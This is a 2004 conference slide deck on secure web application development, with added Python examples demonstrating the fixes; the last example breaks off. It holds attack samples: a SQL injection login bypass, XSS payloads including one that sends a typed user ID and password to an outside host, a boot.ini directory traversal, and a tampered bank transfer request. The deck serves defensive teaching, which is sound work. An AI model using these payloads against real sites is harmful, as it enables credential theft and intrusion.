T16 September 30, 2004 3:00 PM DEVELOPING SECURE WEB APPLICATIONS (PDF document)



SLIDE 1

BIO PRESENTATION
Better Software Conference & EXPO, September 27-30, 2004, San Jose, CA USA

T16, September 30, 2004, 3:00 PM

DEVELOPING SECURE WEB APPLICATIONS

Dennis Hurst, SPI Dynamics Inc

SLIDE 2

Dennis Hurst

Dennis Hurst, senior consulting engineer for SPI Dynamics, is responsible for working with developers to educate them on the need for web application security and practical ways to protect web applications from hacking attacks. With more than 15 years of experience in the information systems/application development industry, he is an expert in the system design, implementation and maintenance of complex multi-vendor, multi-platform computer applications and networks. He has extensive experience in planning, developing and enhancing Internet systems as well as integrating Internet systems with legacy systems. For the past three years he has focused on developing tools to test and secure the HTTP protocol. Dennis is a Microsoft Certified Solution Developer (MCSD in Visual Basic and SQL Server) and a Certified Novell Engineer (CNE) for versions 3.x and 4.x. Furthermore, he has published articles and developed classes on the secure application development process. Dennis has spoken on the topic of secure coding practices at Software Development West 2004, WebSec 2003 and various user group chapter meetings. He has been published in asp.net PRO and on http://www.15seconds.com/Issue/000612.htm.

SLIDE 3

Developing Secure Web Applications

Hacker Exploits, Coding Best Practices and Automated Code Testing Tools

SLIDE 4

Agenda

PART 1: Introductions
PART 2: What is Web Application Security?
PART 3: Web Application Hacks & Application Risks
PART 4: Web Applications and HTTP 101
PART 5: Web Application Attacks
PART 6: Managing & Detecting Vulnerabilities

SLIDE 5

SPI Dynamics

SPI Dynamics delivers security products and services that protect enterprises at the web application layer. These products are backed by the industry's leading security experts, SPI Labs. WebInspect is our industry leading web application security assessment product line and is licensed to enterprises, consultants, and other institutions, both directly and via global partners.

The Expert in Web Application Security Assessment

SLIDE 6

SPI Dynamics believes that security must be implemented across the application lifecycle. The earlier a security defect is detected, the less it will ultimately cost an organization. SPI Dynamics is dedicated to maintaining a leadership position in vulnerability assessment and we truly measure our success through the success of our customers.

SPI Dynamics: The Expert in Web Application Security Assessment

SLIDE 7

PART 2: What is Web Application Security?

• The evolution from web sites to web applications
• Where does the risk come from?

SLIDE 8

Web Sites

[Diagram: Browser <-> Web Server, exchanging HTML]

Simple, single server solutions

SLIDE 9

Web Applications

[Diagram: Browser (and Wireless, Web Services clients) -> Web Servers (Presentation Layer, Media Store) -> Application Server (Business Logic, Content Services) -> Database Server (Customer Identification, Access Controls, Transaction Information, Core Business Data)]

Very complex architectures, multiple platforms, multiple protocols

SLIDE 10

Web Applications Invite Public Access

"Today over 70% of attacks against a company's website or web application come at the 'Application Layer' not the Network or System layer."
- Gartner
SLIDE 11

Web Applications Breach the Perimeter

[Diagram: INTERNET -> DMZ -> TRUSTED INSIDE -> CORPORATE INSIDE. HTTP(S) passes all the way through; the other protocols shown (FTP, TELNET, IMAP, SSH, POP3) are not allowed in from the Internet.]

Firewall only allows PORT 80 (or 443 SSL) traffic from the Internet to the web server.
Rule: Any -> Web Server: 80

Firewall only allows applications on the web server to talk to the application server.
Rule: Web Server -> Application Server

Firewall only allows the application server to talk to the database server.
Rule: Application Server -> Database

Web servers: IIS, SunOne, Apache. Application servers: ASP .NET, WebSphere, Java. Databases: SQL, Oracle, DB2.

SLIDE 12

PART 3: Web Application Hacks and Application Risks

• Who got hacked?
• How they got hacked, what method was used?
• What was the result of being hacked?
• Why web application risks occur
• Web application vulnerabilities

SLIDE 13

Web Application Risk

"Web application incidents cost companies more than $320,000,000 in 2001."

Forty-four percent (223 respondents) of respondents to the 2002 Computer Crime and Security Survey were willing and/or able to quantify their financial losses. These 223 respondents reported $455,848,000 in financial losses.

Source: "2002 Computer Crime and Security Survey", Computer Security Institute & San Francisco FBI Computer Intrusion Squad

SLIDE 14

Recent Web Application Hack Example: Ziff Davis

Hacked August 2002. Ziff Davis Media has agreed to revamp its website's security and pay affected customers $500 each after lax security exposed the personal data of thousands of subscribers last year. The agreement between Ziff Davis -- publisher of PC Magazine and other tech titles, including a slew of gaming magazines -- and attorneys general from New York, Vermont and California came after web surfers discovered an unprotected data file on Ziff Davis' site in November. The file contained names, addresses, e-mail addresses -- and, in some instances, credit card numbers -- of 12,000 people who signed up for a special promotion to receive Electronic Gaming Monthly magazine.

SLIDE 15

Recent Web Application Hacks: Victoria's Secret

Victoria's Secret, November 27, 2002. A vulnerability at the Victoria's Secret web site allowed customers who purchased items there to view other customers' orders. By simply changing the data in the URL address line the web application was manipulated. $50,000 fine and publicity in 2003.

SLIDE 16

Recent Web Application Hacks: Recording Industry Association of America

January 3, 2003. RIAA was hacked 8 times in 6 months. The 6th time the RIAA site was hacked, downloadable, pirated music was posted. This time, a URL allowing access to the RIAA's system for posting press releases was made publicly accessible, allowing people to post messages that then appeared on the RIAA's official press release page.

SLIDE 17

Sept 25th 2003: Car Shoppers' Credit Details Exposed in Bulk. An administrative page was not properly secured, and any personal loan application information could be viewed. Over 1,000 shoppers from multiple websites had their entire financial history exposed on a public site. The researcher simply read the HTML comments, saw the filename, and typed it into his browser.

"The exposure of personal financial information could also put Dealerskins and its customers afoul of Federal Trade Commission (FTC) regulations."

SLIDE 18

Gateway Computers

Wall Street Journal article "More Scary Tales Involving Big Holes in Website Security", by Lee Gomes, February 2nd 2004. Gateway's website stored an ID number in a cookie to identify you when returning to the site. By changing this ID number, you are able to view the information of other shoppers. Information viewable includes Name, Address, Phone Number, Order History, Last Four Digits of Credit Card, Credit Card Expiration Date, Credit Card Verification Code.

SLIDE 19

Federal Trade Commission investigates Guess Inc.

"Guess Settles with FTC over Cyber Security Snafu", June 2003, by Kevin Poulsen for SecurityFocus: "Guess.com was open to an 'SQL injection attack,' permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database -- over 200,000 in all ... The episode prompted a year-long FTC investigation into alleged deceptive trade practices by Guess." "Consumers have every right to expect that a business that says it's keeping personal information secure is doing exactly that," said Howard Beales, Director of the FTC's consumer protection bureau, in a press release. "It's not just good business, it's the law."

SLIDE 20

Other Hacked Websites

• Tiffany.Com - 2004: SQL Injection
• OpenTable.com: Non-random identifiers
• Saks Fifth Avenue: Non-random identifiers
• FTD.com - February 14, 2003: sequential cookies. Source: CNET News, "FTD Hole Leaks Personal Information"
• Travelocity - January 22, 2001: open directory. Source: CNET News, "Travelocity Exposes Customer Information"
• Creditcards.com - December 12, 2000: SQL Injection. Source: CNET News, "Company says extortion try exposes thousands of card numbers"
• CD Universe - January 9, 2000: SQL Injection. Source: Internetnews.com, "Failed Blackmail Attempt Leads to Credit Card Theft"
• MasterCard - February 17, 2003: Partner Liability
• Tower Records - December 5, 2002: Access permissions

SLIDE 21

Why Web Application Risks Occur: The Web Application Security Gap

Security Professionals Don't Know The Applications
Application Developers and QA Professionals Don't Know Security

SLIDE 22

Why Web Application Risks Occur

Developers Are Not Security Professionals
• Application development stresses functionality, not security
• Lack of awareness of security issues in development
• Lack of effective testing tools in Development & QA
• Resource constrained development teams

Security Professionals Are Not Developers
• Lack of awareness of application vulnerabilities in security teams
• Lack of effective testing tools
• Certifications and accreditations don't examine the web application
• Development cycle missing from security procedures and audits
• Security scrutinizes the desktop, the network, and the server. The web application is missing.

SLIDE 23

Web Application Vulnerabilities

Web application vulnerabilities occur in multiple areas.

Platform: Known Vulnerabilities

Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing

Application: Parameter Manipulation, Cross-Site Scripting, SQL Injection, Buffer Overflow, Reverse Directory Traversal, JAVA Decompilation, Path Truncation, Hidden Web Paths, Cookie Manipulation, Application Mapping, Backup Checking, Directory Enumeration
SLIDE 24

Web Application Vulnerabilities: Platform

Known Vulnerabilities

Platform:
• Known vulnerabilities can be exploited immediately with a minimum amount of skill or experience ("script kiddies")
• Most easily defendable of all web vulnerabilities
• MUST have streamlined patching procedures
• MUST have inventory process

SLIDE 25

Web Application Vulnerabilities: Administration

Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing

Administration:
• Less easily corrected than known issues
• Require increased awareness
• More than just configuration, must be aware of security flaws in actual content
• Remnant files can reveal applications and versions in use
• Backup files can reveal source code and database connection strings

SLIDE 26

Web Application Vulnerabilities: Application

Parameter Manipulation, Cross-Site Scripting, SQL Injection, Buffer Overflow, Reverse Directory Traversal, JAVA Decompilation, Path Truncation, Hidden Web Paths, Cookie Manipulation, Application Mapping, Backup Checking, Directory Enumeration

Application Programming:
• User input is not examined from a security perspective.
• Unexpected code
• Error messages......

SLIDE 27

PART 4: Web Applications and HTTP 101

• What are the components of a web application?
• How are these components secured?
• How does HTTP (the web) work?
• How does a hacker see your application?

SLIDE 28

The OSI Reference Model

Layer 1 Physical, Layer 2 Datalink, Layer 3 Network, Layer 4 Transport, Layer 5 Session, Layer 6 Presentation: Network / OS / Service attacks
Layer 7 Application: Web based attacks (HTTP/HTTPS)

Layers 1 through 6 deal with how data is delivered. Layer 7 deals with business logic (content and interpretation).

SLIDE 29

What is a Web-Based Application?

Network -> HTTP -> Web Application

• What is the data path (Network) for web applications?
• How does a web-based application work (HTTP)?
• How does your application work?

SLIDE 30

How Do Web Applications Communicate? Network Layer

Network -> HTTP -> Web Application

SLIDE 31

How Do Web Applications Communicate? Network Layer

1. Client connects to the server
2. Client sends request to server
3. Server responds to client
4. Connection is disconnected

HTTP is stateless.

[Diagram: Client PC (10.1.0.123) -> Request -> Server www.mybank.com (64.58.76.230) Port: 80 -> Response -> Client PC]

SLIDE 32

Securing the Network Layer: SSL (Secure Sockets Layer)

Provides encryption of data between a client and server. Typically guarantees to the client that the server is who it asserts itself to be.

[Diagram: Client PC (10.1.0.123) <- SSL Tunnel -> Server www.mybank.com (64.58.76.230) Port: 443]

SLIDE 33

Securing the Network Layer: SSL, Firewalls

Firewalls allow or disallow traffic to pass from the external network to the internal network. A firewall acts as a "traffic cop". Port 80 (HTTP) and port 443 (HTTPS) travel freely through the firewall.

[Diagram: Client PC (10.1.0.123) <- SSL Tunnel -> Server www.mybank.com (64.58.76.230) Port: 443]

SLIDE 34

Securing the Network Layer: SSL, Firewalls, IDS (Intrusion Detection System)

An IDS monitors the network for malicious activities. Detection is typically signature based (similar to virus protection). It is blind to encrypted (SSL) traffic.

[Diagram: Client PC (10.1.0.123) <- SSL Tunnel -> IDS -> Server www.mybank.com (64.58.76.230) Port: 443]

SLIDE 35

What is HTTP?

Network -> HTTP -> Web Application

SLIDE 36

What is HTTP?

HTML Page:
<a href=http://www.test.me>Click Here</a>

Request (Client PC -> Server):
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.spidynamics.com
Connection: Keep-Alive

Response (Server -> Client PC):
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 07 Apr 2003 12:52:26 GMT
Content-Length: 10225
Content-Type: text/html
Cache-control: private
Set-Cookie: ASPSESSIONIDCSCRRCBS=GODPKFJDPJNMHGGJDOEIDDMK; path=/;

<html>
<body>
SLIDE 37

How Does Your Application Work?

GET: simple query string based request.
POST: contains POST data in the body of the request.

Network -> HTTP -> Web Application

SLIDE 38

HTTP – GET With a Query String

HTML Page:
<a href=http://www.test.me/banklogin.asp?serviceName=FreebankCaastAccess&ID=5 >Click Here</a>

Request:
GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&ID=5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.company.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN

Response:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 04 Apr 2003 15:17:50 GMT
Content-Length: 4183
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=25; path=/;
Set-Cookie: state=GA; path=/;
Set-Cookie: username=MrUser; path=/;
Set-Cookie: userid=1538; path=/;

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>

SLIDE 39

HTTP – POST With POST Data

Form:
<FORM ACTION="login1.asp" METHOD="POST"><br>
Username:<INPUT TYPE="text" NAME="login"><BR>
Password:<INPUT TYPE="password" NAME="password"><BR>
<INPUT TYPE="submit"><BR>
</FORM>

Request:
POST /login1.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,*/*
Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccess
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.company.com
Content-Length: 23
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA;......

login=John&password=Doe

Response:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 04 Apr 2003 15:35:00 GMT
Content-Length: 80
Content-Type: text/html
Cache-control: private

<html>
<body>
Welcome John. ..............</body></html>
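The GET and POST exchanges above show where a web application's input actually arrives: the query string, the headers, the cookies (note that the GET response sets userid and username cookies, which come back on every later request and can be edited just like the Gateway cookie ID on slide 18) and the form body. The following Python is an added example, not code from the deck or from SPI Dynamics; it parses the two requests as the server would and lists every field that the sender controls. The two request strings are constructed from the slides and trimmed; the banklogin.asp and login1.asp endpoints are the deck's hypothetical ones.

```python
"""Parse raw HTTP/1.x requests and enumerate attacker-controlled fields."""
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic, trimmed from the GET and POST slides.
GET_REQUEST = (
    "GET /banklogin.asp?serviceName=FreebankCaastAccess&ID=5 HTTP/1.1\r\n"
    "Host: www.company.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
    "Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; userid=1538\r\n"
    "\r\n"
)
POST_REQUEST = (
    "POST /login1.asp HTTP/1.1\r\n"
    "Host: www.company.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 23\r\n"
    "Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25\r\n"
    "\r\n"
    "login=John&password=Doe"
)


def parse_request(raw):
    """Split a raw request into method, path, query, headers, cookies, form.
    Every one of these parts is chosen by whoever sends the request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    # parse_qs keeps each value as a list: the same name may be sent twice.
    query = parse_qs(url.query, keep_blank_values=True)
    cookies = SimpleCookie()
    cookies.load(headers.get("cookie", ""))
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        # Content-Length is itself user input: never read past the bytes present.
        declared = int(headers.get("content-length", "0"))
        form = parse_qs(body[:declared], keep_blank_values=True)
    return {
        "method": method,
        "path": url.path,
        "query": query,
        "headers": headers,
        "cookies": {k: v.value for k, v in cookies.items()},
        "form": form,
    }


def user_controlled_fields(parsed):
    """Names of everything the server might read from this request, sorted.
    Cookies and headers are on the list: they are not more trustworthy than the form."""
    fields = [f"query:{k}" for k in parsed["query"]]
    fields += [f"cookie:{k}" for k in parsed["cookies"]]
    fields += [f"form:{k}" for k in parsed["form"]]
    fields += [f"header:{k}" for k in parsed["headers"]]
    return sorted(fields)


if __name__ == "__main__":
    for raw in (GET_REQUEST, POST_REQUEST):
        parsed = parse_request(raw)
        print(parsed["method"], parsed["path"], user_controlled_fields(parsed))
```

The parser deliberately treats cookies, headers and body the same way: a value such as userid=1538 arriving in a Cookie header was set by the server once, but every later copy of it is typed by the client.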

SLIDE 40

PART 5: Web Application Attacks

Questions for each attack:
• Define – What is it and what is at stake?
• Result – How does it happen?
• Fix – How to fix web application vulnerabilities?

Types of Attacks:
• SQL Injection
• Cross Site Scripting (XSS)
• Directory Traversal
• Hidden parameters

SLIDE 41

SQL Injection – Defined

SQL injection is a technique for exploiting web applications that build SQL queries from client-supplied data without first neutralizing the characters that have meaning in SQL, or, better, without keeping the data separate from the query text altogether (see the parameterized-query fix later in this part).

SLIDE 42

SQL Injection – Simple Example

'/
'/ Login SQL Statement
'/
SQLtemp = "SELECT * FROM Users " & _
          "WHERE userID = '" & Request.Form("username") & "' " & _
          "and pass = '" & Request.Form("password") & "'"
Set rs = Apples.Execute(SQLtemp)
If not rs.eof then
    '/ Successful login!!
    .....

SLIDE 43

SQL Injection – Simple Example

[Screenshot: SQL Example, Return Response]

SLIDE 44

SQL Injection – Simple Example

What the hacker knows:
• The web page is creating a SQL statement that takes two parameters.
• The parameters are both strings.
• The parameters are, most likely, being passed to the database unfiltered.

The hacker can now guess that the SQL statement looks something like this:

Select <something> from <sometable>
where <fieldone> = '<user input one>'
And <fieldtwo> = '<user input two>'

The hacker can now start making educated guesses, for example sending ' or 1=1 or 'a'=' in both fields, which turns the statement into:

Select <something> from <sometable>
where <fieldone> = '' or 1=1 or 'a'=''
And <fieldtwo> = '' or 1=1 or 'a'=''

SLIDE 45

SQL Injection – Simple Example

[Screenshot: SQL Example]

SLIDE 46

SQL Injection – Solution

• Use parameterized queries
• Trap your Errors!!! Don't let the environment
• Use Stored Procedures
• Validate User Input
• Turn off default error messages

cnn = new SqlConnection(…database connection information here…);
cmd = new SqlCommand("SELECT FirstName, LastName from Users " +
                     "WHERE UserName = @uid AND password = @passwd", cnn);
cmd.Parameters.Add("@uid", SqlDbType.VarChar, 100).Value = uid;
cmd.Parameters.Add("@passwd", SqlDbType.VarChar, 100).Value = passwd;
cnn.Open();
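The concatenated login query from slide 42, the ' or 1=1 or 'a'=' guess from slide 44 and the parameterized fix from this slide, rebuilt together in Python on an in-memory SQLite database so the effect can be run end to end. This is an added example, not the deck's ASP or C# code; the Users table and its two rows are constructed for the demonstration. It also shows what "trap your errors" buys: a lone quote in the username makes the concatenated query fail, and the database's own error text is the signal an attacker uses to confirm the injection point. Trapping it removes the oracle but not the injection; only the parameterized version removes the injection.

```python
"""SQL injection: concatenated login query versus parameterized query."""
import sqlite3

# The payload from the "what the hacker knows" slide, used for both fields.
PAYLOAD = "' or 1=1 or 'a'='"


def make_db():
    """Constructed Users table with two rows; the schema mirrors the slide's query."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE Users (userID TEXT, pass TEXT, FirstName TEXT, LastName TEXT)"
    )
    con.executemany(
        "INSERT INTO Users VALUES (?, ?, ?, ?)",
        [("admin", "s3cret", "Site", "Admin"), ("john", "Doe", "John", "Smith")],
    )
    return con


def login_vulnerable(con, username, password):
    """Same construction as the slide's SQLtemp: input pasted into the SQL text,
    so a quote in the input ends the string literal and the rest becomes SQL."""
    sql = (
        "SELECT FirstName, LastName FROM Users WHERE userID = '" + username
        + "' and pass = '" + password + "'"
    )
    return con.execute(sql).fetchone()  # (FirstName, LastName) or None


def login_parameterized(con, username, password):
    """The solution slide's approach: placeholders in the SQL, values passed
    separately. A quote in the input is compared as data, never parsed as SQL."""
    sql = "SELECT FirstName, LastName FROM Users WHERE userID = ? AND pass = ?"
    return con.execute(sql, (username, password)).fetchone()


def sql_error_message(con, username):
    """What a default error page would leak for a probing input such as a lone
    quote: the database's own syntax error. Returns None when the query ran."""
    try:
        login_vulnerable(con, username, "")
        return None
    except sqlite3.Error as exc:
        return str(exc)


def login_vulnerable_trapped(con, username, password):
    """Error trapping alone: the oracle is gone, the injection remains."""
    try:
        return login_vulnerable(con, username, password)
    except sqlite3.Error:
        return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload in both fields:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized, same payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
    print("parameterized, real credentials:", login_parameterized(db, "john", "Doe"))
    print("leaked error for a lone quote:", sql_error_message(db, "'"))
```

With the payload in both fields the concatenated WHERE clause becomes userID = '' or 1=1 or 'a'='' and pass = '' or 1=1 or 'a'='', which is true for every row, so the first user in the table (here the admin) is "logged in". The parameterized query compares the literal payload string against userID and finds nothing.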

SLIDE 47

Cross Site Scripting (XSS)

Cross-site scripting (also known as XSS or CSS) occurs when dynamically generated web pages display input that is not properly validated. A user passes input in the form of a parameter to the web server. The web server returns the user-provided input back to the user without proper encoding.

SLIDE 48-52

[Screenshots of the XSS walkthrough; the only recoverable text is the attack URL on slide 52]

http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20<script>alert(document.cookie)</script>

SLIDE 53

Cross Site Scripting (XSS)

HTML:
<input type=text name=txtUserID ....
<input type=text name=txtPassword ...

XSS JavaScript:
var oImg = new Image;
oImg.src = "http://www.test.me/"
    + document.frmTest.txtUserID.value + "."
    + document.frmTest.txtPassword.value;

Web Log:
.... 127.0.0.1 GET /test/xss.asp 200
.... 127.0.0.1 GET /MyUserID.MyPassword 404
.... 127.0.0.1 GET /test/xss.asp 200

SLIDE 54

Cross Site Scripting (XSS) - Solution

HTML-encode all data before it is RETURNED to a user's web browser:
• Data that comes from a user
• Data that comes from a database
• Data that comes from any dynamic source

Server.HTMLEncode provides this functionality.
Validate user input.
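The reflected XSS from the slide 52 URL, as an added Python example (not the deck's ASP code): a login page that echoes the err parameter into its HTML body, once raw and once HTML-encoded with html.escape, the standard-library counterpart of Server.HTMLEncode. The page template is constructed for the demonstration. One caveat the slide does not state: entity encoding is the right fix when the data lands in HTML text or a quoted attribute value; data placed inside a script block or a URL needs the encoder for that context instead.

```python
"""Reflected XSS: echoing a query parameter raw versus HTML-encoded."""
import html
from urllib.parse import parse_qs, urlsplit

# The attack URL from slide 52.
ATTACK_URL = (
    "http://www.freebank.com/banklogin.asp?err=Invalid%20Login:"
    "%20<script>alert(document.cookie)</script>"
)

# Constructed page skeleton; {err} marks where the server inserts the message.
TEMPLATE = (
    '<html><body><p class="error">{err}</p>'
    '<form method="POST" action="login1.asp">...</form></body></html>'
)


def err_param(url):
    """The err value exactly as the server sees it after URL decoding."""
    query = parse_qs(urlsplit(url).query)
    return query.get("err", [""])[0]


def render_vulnerable(err):
    """Inserts user input straight into the HTML body (the slide's behaviour)."""
    return TEMPLATE.replace("{err}", err)


def render_encoded(err):
    """HTML-encodes first: < > & " ' become entities, so the browser shows the
    text instead of parsing a <script> element out of it."""
    return TEMPLATE.replace("{err}", html.escape(err, quote=True))


def contains_script_tag(page):
    """Crude QA-style check on the rendered output: is there a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    err = err_param(ATTACK_URL)
    print("parameter:", err)
    print("raw:     ", render_vulnerable(err))
    print("encoded: ", render_encoded(err))
```

The encoded page still displays the attacker's text, including the literal characters "<script>", but as text; the payload never becomes markup, so document.cookie is never read.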

SLIDE 55

Directory Traversal – Result

This is a standard site that shows a list of available documents in the FAQ folder.

SLIDE 56

Directory Traversal – Result

Clicking on one of the links shows the selected document. Notice the parameter ?Template=Check+Card%2Etxt. When you URL-decode that parameter it looks like:

?Template=Check Card.txt

This could be a file name.

SLIDE 57

Directory Traversal – Result

Changing the Template parameter to ../../../../../boot.ini opened the boot.ini file. A hacker can now read any file on the hard drive that the web server's process account is allowed to read.

SLIDE 58

Directory Traversal – The Code

The vulnerable code:

sFile = Request("Template")                          '/ Get the parameter
if sFile <> "" then                                  '/ User passed a parameter
    if fso.FileExists(sDir & "\" & sFile) then
        set oStream = fso.OpenTextFile(sDir & "\" & sFile, 1, false)
    end if
end if

Secure version of the code:

sFile = Request("Template")                          '/ Get the parameter
'/ Quick security check
if Regex.Match(sFile, "[^a-zA-Z0-9.]") <> "" then    '/ Look for invalid characters
    sFile = ""                                       '/ Looks odd, don't accept it
end if
if sFile <> "" then                                  '/ User passed a parameter
    if fso.FileExists(sDir & "\" & sFile) then
        set oStream = fso.OpenTextFile(sDir & "\" & sFile, 1, false)
    end if
end if

SLIDE 59

Directory Traversal - Fix

• Avoid using a parameter as a file name.
• When using a parameter as a file name, use EXTREME caution to ensure that the name passed in is a valid file name and is not trying to reference a file in a parent folder.
• Limit the web server to only access appropriate folders on the web server and not parent folders outside the web site file structure.
• ....and..... validate user input.
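An added Python example (not the deck's ASP) of the second fix above: a Template parameter that is accepted only if it is a single plain file name and, independently, only if the resolved path stays inside the FAQ folder. Two points the slide 58 code leaves open are handled here. First, its character filter [^a-zA-Z0-9.] would reject the site's own legitimate "Check Card.txt" because of the space, so the allowlist below admits spaces but still refuses path separators and names starting with a dot. Second, the realpath containment check holds even if someone later loosens the regex. The .txt suffix and the temporary FAQ folder are assumptions for the demonstration.

```python
"""Safe resolution of a file-name parameter against a fixed base folder."""
import os
import re
import tempfile
from urllib.parse import unquote_plus

# One path component: must start with a letter/digit/_/-, may contain spaces,
# dots, dashes, underscores, and must end in .txt. No slash, backslash or
# leading dot, so '.', '..' and dotfiles never match.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-][A-Za-z0-9 ._-]*\.txt$")


class UnsafePath(ValueError):
    """Raised when a Template value is refused."""


def resolve_template(base_dir, template_param):
    """Map the raw Template query value to a path inside base_dir or raise."""
    name = unquote_plus(template_param)  # 'Check+Card%2Etxt' -> 'Check Card.txt'
    if not SAFE_NAME.fullmatch(name):
        raise UnsafePath(f"rejected name: {name!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # Independent second check: the resolved path must lie under the FAQ folder.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePath(f"escapes base dir: {candidate}")
    return candidate


def read_template(base_dir, template_param):
    """Read the document the slide's page would display."""
    with open(resolve_template(base_dir, template_param), encoding="utf-8") as f:
        return f.read()


# Inputs tried by demo(): the slide's attack plus common variants.
TRAVERSAL_ATTEMPTS = (
    "../../../../../boot.ini",
    "..%2F..%2Fboot.ini",
    "..",
    "Check Card.txt/../../etc/passwd",
    ".hidden.txt",
)


def demo():
    """Build a throwaway FAQ folder, serve the legitimate document and try the
    traversal attempts. Returns (document_text, list_of_rejected_inputs)."""
    with tempfile.TemporaryDirectory() as faq:
        with open(os.path.join(faq, "Check Card.txt"), "w", encoding="utf-8") as f:
            f.write("Check card FAQ")  # constructed document
        document = read_template(faq, "Check+Card%2Etxt")
        rejected = []
        for attempt in TRAVERSAL_ATTEMPTS:
            try:
                resolve_template(faq, attempt)
            except UnsafePath:
                rejected.append(attempt)
        return document, rejected


if __name__ == "__main__":
    text, refused = demo()
    print("served:", text)
    print("refused:", refused)
```

Restricting the web server's account to the FAQ folder (the third bullet above) is the backstop for the case where this code is bypassed; it does not replace the check, and the check does not replace it.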

SLIDE 60

Hidden Parameters

Hidden parameters allow developers to pass variables to and from a web browser in the same way other <input> tags do; however, they are not seen by the end user. The format is:

<input type=hidden name=myname value=myvalue>

The primary danger in using hidden parameters is that they can be modified by a hacker and are seldom tested during the development and QA process.

SLIDE 61-63

Hidden Parameters - Example

[Screenshots of the transfer form and its hidden fields]
SLIDE 64

Hidden Parameters – The Hack

Request before the hack Request after the hack

POST /BankSite/xferconfirm.asp HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Referer: http://www.nubank.me/BankSite/acctxfer.asp Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705) Host: www.nubank.me Content-Length: 103 Connection: Close Cache-Control: no-cache Cookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM fromAcct=120199789890&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfer POST /BankSite/xferconfirm.asp HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Referer: http://www.nubank.me/BankSite/acctxfer.asp Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705) Host: www.nubank.me Content-Length: 103 Connection: Close Cache-Control: no-cache Cookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM fromAcct=44797501008896675&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfe

SLIDE 65

Hidden Parameters – The Hack

[Screenshot of the confirmation page for the altered transfer]

SLIDE 66

Hidden Parameters – The Fix

• Never assume a hidden parameter has not been tampered with by the end user.
• Never put secure information in a hidden parameter.
• Ensure that proper QA testing of all hidden parameters is done prior to going live with any application.
• Add proper hidden parameter use guidelines to development methodology documents and processes.
• ....and again.... validate user input.

SLIDE 67

The fix – Trust but verify

• Validate ALL user input
• Validate every time you use user input
• Everything in a request is "user input"
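What the first two bullets on slide 66 mean in code, as an added Python example that is not the deck's own: the server handling the slide 64 transfer POST decides whether fromAcct may be debited from its session, never from the form. The session table, the account-ownership table and the user names are constructed for the demonstration; the account numbers, session cookie and request bodies are the slide's. A second, smaller technique is included because it is often proposed as the fix: signing the hidden value with an HMAC so edits are detected. That only proves the value was once emitted by the server; it cannot tell the server whether this user may use it, so it complements the ownership check and does not replace it.

```python
"""Server-side authorization of a transfer request with a hidden fromAcct."""
import hashlib
import hmac
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs

# Constructed server state: account owners and live sessions.
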